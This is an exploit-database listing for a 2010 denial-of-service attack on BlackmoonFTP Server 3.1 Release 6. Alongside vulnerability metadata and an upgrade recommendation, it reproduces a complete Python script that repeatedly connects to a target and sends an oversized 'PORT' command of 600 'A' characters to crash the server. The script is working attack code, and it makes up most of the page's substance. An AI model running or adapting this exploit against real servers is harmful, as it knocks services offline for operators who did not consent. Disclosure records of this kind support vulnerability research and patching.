header-logo
Suggest Exploit
vendor:
BlackmoonFTP Server
by:
Craig Freyman (cd1zz)
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: BlackmoonFTP Server
Affected Version From: 3.1 Release 6 - Build 1735
Affected Version To: 3.1 Release 6 - Build 1736
Patch Exists: YES
Related CWE: N/A
CPE: a:blackmoon_ftp_server:blackmoon_ftp_server:3.1_release_6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

BlackmoonFTP Server DOS

This exploit is a Denial of Service (DoS) attack against BlackmoonFTP Server version 3.1 Release 6 - Build 1735 and 1736. It sends a malicious buffer of 600 'A' characters to the server, which causes it to crash. The exploit is written in Python and can be run from the command line.

Mitigation:

Upgrade to the latest version of BlackmoonFTP Server.
Source

Exploit-DB raw data:

#!/usr/bin/python

# Exploit Title: BlackmoonFTP Server DOS
# Date: 12/28/2010
# Author: Craig Freyman (cd1zz)
# Software Link: http://www.mediafire.com/?bnc4d00myymmx55
# Version: 3.1 Release 6 - Build 1735 and 1736
# Tested On: Windows XP SP3
# Vendor Contacted: 12/28/2010
# Vendor Fixed: 1/13/2011

import socket
import sys

buffer = '\x41' * 600

counter = 1

if len(sys.argv) != 3:
    	print "Usage: ./blackmoonDOS.py <ip> <port>"
        sys.exit()
 
ip   = sys.argv[1]
port = sys.argv[2]

while counter <= 300:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	try:	
		print "[*] Sending evil buffer. Count " + str(counter) + " out of 300"
		s.connect((ip,int(port)))
		s.recv(1024)
		s.send('PORT ' + buffer + '\r\n')
		s.recv(1024)
		s.send('QUIT \r\n')
		s.recv(1024)	
		s.close()
		counter=counter+1
	except:
		print "Check the service - probably dead!"
		sys.exit()